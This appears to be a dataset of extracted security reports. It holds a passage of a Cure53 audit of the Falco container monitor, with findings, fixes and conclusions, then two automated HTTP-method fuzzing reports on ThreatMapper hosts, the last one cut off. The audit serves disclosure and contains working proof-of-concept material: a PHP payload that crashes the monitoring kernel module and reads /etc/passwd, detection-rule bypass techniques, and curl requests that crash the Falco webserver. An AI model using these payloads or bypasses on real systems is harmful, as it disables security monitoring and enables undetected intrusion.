Man-in-the-Middle scenario.\n•A HTTP-fuzzer was deployed against the webserver but no reproducible crashes\ncould be provoked with this approach.\n•Dozens of default filter-rules were audited in detail. A collection of problems was\nidentified, eventually leading to the filing of FAL-01-002.\nCure53, Berlin · 07/24/19 4/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIdentified Vulnerabilities\nThe following sections list both vulnerabilities and implementation issues spotted during\nthe testing period. Note that findings are listed in chronological order rather than by their\ndegree of severity and impact. The aforementioned severity rank is simply given in\nbrackets following the title heading for each vulnerability. Each vulnerability is\nadditionally given a unique identifier (e.g. FAL-01-001) for the purpose of facilitating any\nfuture follow-up correspondence.\nFAL-01-001 Driver: Undetected crash disables Falco monitoring (Critical)\nIt was discovered that the kernel module crash found in Sysdig ( SYS-01-003) is not\ndetected by the Falco application. This means that Falco is unaware that the module has\ncrashed and no longer receives system call events. SYS-01-003 can be triggered from\nan unprivileged process and within a container, which allows a malicious entity to\neffectively disable the monitoring system and perform any desired action without Falco\nbeing notified.\nWhat follows is a Proof-of-Concept (PoC) that assumes an attacker who manages PHP\ncode execution in a vulnerable web application.\nPoC. PHP Code execution with ngnix:\n<?php\nif(glob(\"/etc/falco/*\")){echo \"[x] Falco installed\\n\";\n$poc1 = \"int main(){syscall(19, 0xffffffffffffffff, 0xffffffffffffffff, \n0xffffbc1000000000, 0x5633fff478f1);return 0;}\";\n$poc2 = \"int main(){char buf[4096] = {0x41};syscall(19, 0xffffffffffffffff, \n&buf, 0x80000001, 0x5633fff478f1);return 0;}\";\nfile_put_contents(\"/tmp/b.c\", $poc2);\n$bypass = \"/usr/sbin/nginx -c /etc/nginx/nginx.conf\";\nsystem(\"PATH=/usr/local/bin:/usr/bin:/bin /usr/bin/gcc /tmp/b.c -o /tmp/crash &&\n/tmp/crash\" . \";#$bypass\");\necho \"[x] Falco disabled\\n\";\nsystem(\"ls -la; cat /etc/passwd; whoami; id;\");\n}else{echo \"[x] Falco not found\\n\";}\n?>\nA simple check is performed to ensure Falco is installed. Next, the PoC C-sourcecode\nfrom SYS-01-003 is written to a file, compiled and executed. Note that here an additional\nbypass, explained in FAL-01-002, is used to ensure that the compile command is not\nregistered by Falco.\nIn the above PoC, two different payloads can be used to execute the system call. The\ndifference is that poc1 contains an invalid user-space address (second syscall\nCure53, Berlin · 07/24/19 5/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nparameter) and a larger third parameter. This disables the monitoring as well, although\nthe root cause is not clear. Surprisingly, poc1 does not crash the kernel module when\none just looks at Sysdig. This needs further investigation as some sort of discrepancy\nexists when it comes to running Sysdig as a standalone versus running it as bundled\nwith Falco.\nIt is recommended to implement a mechanism that detects if the kernel module is\nactually running or not; an immediate detection of a crash would ideally re-initialize the\nmodule.\nFAL-01-002 Falco: Bypassing various rules with different techniques (High)\nA set of default macros and rules is provided inside falco_rules.yaml. During the audit,\nmultiple ways to bypass said rules were discovered. An array of methods ensues.\nBypassing path-based checks with / proc/self/root\nMost file-related rules implement their checks based on the fd.name and fd.directory\nparameters. Oftentimes, it is assumed that the paths are absolute, i.e. “ startswith /some/\npath”. With operating system-level symlinks, such as /proc/self/root/ which links back to\n“/”, all of the rules may be bypassed. This is because all paths can be accessed via\n“/proc/self/root/some/path ” in this case.\nBypassing cmdline-based checks with subcommands\nAcross various places, proc.cmdline is used to determine if certain strings are present or\nnot and this is done to detect malicious behavior. One example is the macro called\nparent_scripting_running_builds . Cure53 discovered that the checks can be bypassed\nwith the use of subcommands. The existing rules were modified to rely on the above-\nmentioned macro to demonstrate the issue in the following Proof-of-Concept (PoC).\nPoC:\n$ # Detected command:\n$ php -r 'system(\"git --version\");'\n$ # Undetected command\n$ php -r 'system(\" $(echo \\\"git --version\\\") \");'\nResulting cmdline:\n# Detected command\ncommand=sh -c git --version\n# Undetected command\ncommand=sh -c $(echo \"git --version\")\nCure53, Berlin · 07/24/19 6/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nFalco tries to detect if “ sh -c git” is called by checking whether the cmdline starts with\nthat particular string. As demonstrated above, this is no longer the case subcommands\nare in play.\nVarious other methods leading to bypasses\nAlthough the first two bypasses already circumvent a substantial number of rules, both\nless general and more specific bypasses for the remaining rules were also found.\nThe rules solely checking if files get opened for writing, such as Update Package\nRepository, can be evaded by writing a file into /tmp/ for instance and then moving it\nafterwards to the new location. Same applies to the Create Hidden Files or Directories\nrules which can be approached with renaming of the created folder/file.\nSome rules were found to be overly specific in their conditions. Set Setuid or Setgid bit,\nfor instance, checks only if chmod is called with the exact params of “ +s” or “4777”, thus\npassing “0477” or “6777” unnoticed. The same pattern can be observed for the rules\nwhich monitor only specific binaries for certain actions. The discrepancy is, for example,\nbetween Delete Bash History . “shred, rm, mv” which are being checked and binaries -\nsuch as unlink - which are not handled in the same way and remain unchecked.\nFinally, rules were found to be too broad in their definitions. Macros such as\nnginx_starting_nginx check if a cmdline contains a certain substring. This can be trivially\nbypassed, for example by adding a comment to the end of the malicious cmdline,\nsimulating a normal action. The PoC in FAL-01-001 demonstrates this.\nConsidering all these different means of bypassing the rules, it becomes quite clear that\nwriting a bullet-proof ruleset is a strenuous challenge. It is recommended to rethink the\ncurrent approach of handling filter-rules and, possibly, redefine the scope and\nfunctionality of this item.\nFAL-01-003 Falco: HTTP request with incorrect data leads to crashes (High)\nIt was discovered that the Falco webserver can be crashed by sending a request with\nmalformed JSON data. This allows attackers with local access or SSRF capabilities to\ndisable surveillance in its entirety. However, this issue requires the attacked environment\nto have access to the webserver’s port. In a properly containerized setup this is not the\ncase. The following PoC demonstrates how a simple request leads to a crash in Falco.\nPoC:\ncurl http://127.0.0.1:8765/k8s_audit --data ' {\"kind\":0}' -H \"Content-Type: \napplication/json\"\nCure53, Berlin · 07/24/19 7/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nFalco Crash:\nroot@sysdigtest:/tmp# falco\n[...]\nWed Jun 26 13:07:13 2019: Starting internal webserver, listening on port 8765\nterminate called after throwing an instance of 'nlohmann::detail::type_error'\n what(): [json.exception.type_error.302] type must be string, but is number\nAborted\nAs the error states, the problem is caused by an integer value where a string is actually\nexpected for the comparison. This can be seen in the following piece of code.\nAffected File:\n/userspace/engine/falco_engine.cpp\nAffected Code:\nbool falco_engine::parse_k8s_audit_json(nlohmann::json &j, std::list<json_event>\n&evts)\n{\nif(j.value(\"kind\", \"<NA>\") == \"EventList\" )\nFurthermore, it was discovered that not just application-specific payloads can be used to\ncrash the server but this can also be accomplished with malformed JSON strings. This\ncan be seen in the PoC request below.\nPoC:\ncurl http://127.0.0.1:1337/k8s_audit --data '5E5555' -H \"Content-Type: \napplication/json\"\nFalco Crash:\nterminate called after throwing an instance of 'nlohmann::detail::out_of_range'\n what(): [json.exception.out_of_range.406] number overflow parsing '5E5555'\nAborted\nExceptions that may occur while handling user-provided data should not be fatal to the\nintegrity of the application. It is recommended to ignore the malformed request rather\nthan react with a termination of the application.\nCure53, Berlin · 07/24/19 8/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nMiscellaneous Issues\nThis section covers those noteworthy findings that did not lead to an exploit but might aid\nan attacker in achieving their malicious goals in the future. Most of these results are\nvulnerable code snippets that did not provide an easy way to be called. Conclusively,\nwhile a vulnerability is present, an exploit might not always be possible.\nFAL-01-004 Falco: Dependencies pulled via hard-coded HTTP links (Low)\nApart from auditing the source code of the Falco application, the build scripts were\nanalyzed as well. It was noticed that some dependencies in the CMake-files are\ndownloaded via hard-coded HTTP links. The following contents of the CMakeLists.txt\nserve as an example.\nAffected File:\nCMakeLists.txt\nAffected Code (an example):\nelse()\n set(ZLIB_SRC \"${PROJECT_BINARY_DIR}/zlib-prefix/src/zlib\")\n message(STATUS \"Using bundled zlib in '${ZLIB_SRC}'\")\n set(ZLIB_INCLUDE \"${ZLIB_SRC}\")\n set(ZLIB_LIB \"${ZLIB_SRC}/libz.a\")\n ExternalProject_Add(zlib\n# START CHANGE for CVE-2016-9840, CVE-2016-9841, CVE-2016-9842, \nCVE-2016-9843\nURL \n\"http://s3.amazonaws.com/download.draios.com/dependencies/zlib-1.2.11.tar.gz\"\nBecause the download happens via a clear-text connection, any attackers with Man-in-\nthe-Middle capabilities (for example after a successful intrusion into internal network\noccurred) can easily spoof the connection to download malicious executables instead. It\nis therefore recommended to replace all HTTP links with their HTTPS equivalents. In\naddition to that, it is also recommended to cease hardcoding of the version numbers (like\nzlib-1.2.11.tar.gz in the example above). Instead, referral should always be to the -latest\npackage from the official vendor. This offers slightly stronger guarantees that the latest\nsoftware version is always used.\nCure53, Berlin · 07/24/19 9/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nFAL-01-005 Falco: Security flags not enforced by Makefile (Low)\nOne of the realms reviewed during almost every security test of a new project\nencompasses studying the presence of hardening flags applied when the software is\nbuilt. This can be done with tools like checksec1 or PEDA2 once the software has been\ncompiled with the default options inside the Makefile at hand.\nSysdig Security Flags:\n# gdb /usr/bin/sysdig\ngdb-peda$ checksec\nCANARY : ENABLED\nFORTIFY : disabled\nNX : ENABLED\nPIE : disabled\nRELRO : disabled\nFrom the GDB’s output, it is apparent that the hardening flags are derived from the\nglobal Linux distribution setting rather than forced from the CMakeLists.txt itself. From\nthis follows that certain hardening checks are missing. These include\nFORTIFY_SOURCE.\nAlthough modern compilers enable those settings by default, it is important to set the\nnecessary CFLAGS/CXXFLAGS inside the CMakeLists.txt itself. This should be done in\norder to directly instruct the compiler to insert all of the security flags required. Once\nactivated, the exploitation of multiple kinds of memory corruption vulnerabilities becomes\nmuch more difficult. This increase in security comes from two reasons: one having to do\nwith requiring additional information leaks from the program’s memory, and the other\nrevolving around establishing that the problems are mitigated by newly introduced length\nchecks.\nThe following snippet shows what CFLAGS/CXXFLAGS are recommended as an\naddition to the CMakeLists.txt file.\nSecurity Flags:\nset(CMAKE_POSITION_INDEPENDENT_CODE ON)\nset(SYSDIG_SECURITY_FLAGS \" -Wl,-z,relro,-z,now -pie -fPIE -fstack-protector-all \n-D_FORTIFY_SOURCE=2 \")\nset(CMAKE_C_FLAGS \"${CMAKE_C_FLAGS} ${SYSDIG_SECURITY_FLAGS}\")\nset(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS} ${SYSDIG_SECURITY_FLAGS}\")\nWith these settings enabled, checksec should yield the following output:\n1 http://www.trapkit.de/tools/checksec.html2 https://github.com/longld/peda\nCure53, Berlin · 07/24/19 10/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nSysdig Security Flags:\ngdb-peda$ checksec\nCANARY : ENABLED\nFORTIFY : ENABLED\nNX : ENABLED\nPIE : ENABLED\nRELRO : Full\nCure53, Berlin · 07/24/19 11/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nConclusions\nJudging by the relatively low amount of relevant vulnerabilities and only a handful of\nmiscellaneous issues, Cure53 has gained a good impression of the examined Falco\nsoftware complex and the underlying open-source variant of Sysdig. Even though one of\nthe issues was classified as being “ Critical” in terms of severity, this summer 2019\nproject demonstrates that the Falco software generally keeps its security promises.\nCure53 confirms that Falco already constitutes a mature security solution for container\nruntimes. The problems documented as a result of this June and July 2019 assessment\nmay be rectified with relatively low effort and certainly within a minimal timeframe.\nImportantly, the involved members of the development team were engaged in the\nauditing process, despite an initial delay at the start of the project. The individual\nturnaround times for answering questions were quite impressive and the provided\nfeedback was clear.\nAs regards technical details, especially the undetected crash is worrisome because it\ndisables all of the Falco’s monitoring. This lowers the integrity of the security promise the\nsystem intends on keeping. The current implementation of the filter-rules may need to be\nreworked. Perhaps some revisions are also needed in connection with the architecture\nof certain design aspects as the current strategies do not prevent a multitude of possible\nrule-bypasses. Other user-space issues could be grouped together under the heading of\nsimple implementation oversights that appear difficult to fully exploit. It is still\nrecommended that the development team looks for issues similar to the ones identified\nhere. These efforts should be more comprehensive to make sure that problems are\nprevented across the board in a consistent manner. As usual at this point, it is\nrecommended to treat all relevant dependencies with the same scrutiny.\nIt needs to be reiterated that this security-focused audit of the Falco security system was\ngenerously funded by The Linux Foundation / Cloud Native Computing Foundation. The\nresources allowed a team of six Cure53 testers to scrutinize the software for a total of\neighteen person-days. The project itself ignited the interest of the developers linked to\nthe underlying Sysdig system and they gladly jumped on the opportunity to join this\nassessment. As a result, the counterpart team at Sysdig initiated a corresponding audit\nof the open-source edition of Sysdig. The combined scope of both investigations made it\npossible for a very good coverage of the integrated software complex to be reached.\nCure53 attests good general health and security of the project and this will especially\nhold once the “Critical” issue gets mitigated. The testers are further hoping that all\nremaining issues will be fixed swiftly.\nThe overall indicators pertaining to the security of the Falco monitoring system, which\nwere established and evaluated during this summer 2019 Cure53 assessment, testify to\nCure53, Berlin · 07/24/19 12/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nthe project being in good shape from a security stance. The code reads well and seems\nto be maintainable without major effort. The choice of the implementation language and\nthe dependent components leaves room for some errors, yet these represent typical\nflaws of many of the contemporary software systems. The documentation appears\ncomplete and the examined aspects exhibit good quality when it comes to security of the\naudited software system. To sum up, the general status of the Falco system is deemed\nstable and correct with only few aspects calling for more attention.\nCure53 would like to thank Michael Ducy, Mark Stemm, Leonardo Di Donato and\nLorenzo Fontana from the Falco development team, as well as Chris Aniszczyk of The\nLinux Foundation, for their excellent project coordination, support and assistance, both\nbefore and during this assignment. Special gratitude also needs to be extended to The\nLinux Foundation for sponsoring this project.\nCure53, Berlin · 07/24/19 13/13" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2022-08-04 21_43_48.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin Project 3/Security Test Suite 1/https://137.184.10.129 TestCase\nSummary\nStarted at 2022-08-04 21:43:48\nTime taken 00:00:11.348\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingPOST 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PURGE https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest COPY https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest UNLOCK https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest LOCK https://137.184.10.129/ HTTP/1.1Test Step POST\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PROPFIND https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PATCH https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest TRACE https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest OPTIONS https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest HEAD https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest DELETE https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PUT https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest GET https://137.184.10.129/ HTTP/1.1\nTest Step POSTModified \nParametersName Value\nmethod GET\nResponseContent-type: text/html; charset=UTF-8\n21623 Content length: \nResponse is too big. Beginning of the response:\n<!doctype html><html lang=\"en\"><head><title>Deepfence</title><meta charset\n=\"utf-8\"/><meta name=\"viewport\" content=\"width=device-width,initial-scale=\n1,shrink-to-fit=no\"/><script>window.__DF_CSRF_TOKEN = '$__\nCSRF_TOKEN_PLACEHOLDER__';</script><script src=\"env-config.js\"></script><\nlink rel=\"shortcut icon\" href=\"data:image/x-icon;base64,\nAAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKA\nAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAACvcho6sXAbQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAtHMcubNyHcEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuHYaOrd5Hf64eR3+\nuHkbQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALx+\nG7m9fx3/vX8d/7x+\nG8EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMGDGjrAhBz+\nwIMbycGDHMfBhBz+\nw4MZPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADFiRq5xYoc/\n8OIGlbEihvpxYob9caJGTIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKkRU\n6yZAb/smPGsrLkBl2ypAb/8...\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.GET\nIssue Number #12" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-14 18_27_51.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin Project 3/Security Test Suite 1/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 18:27:51\nTime taken 00:00:08.396\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingPOST 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PURGE https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest COPY https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest UNLOCK https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest LOCK https://164.90.157.161/ HTTP/1.1Test Step POST\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PROPFIND https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PATCH https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest TRACE https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest OPTIONS https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest HEAD https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest DELETE https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PUT https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull 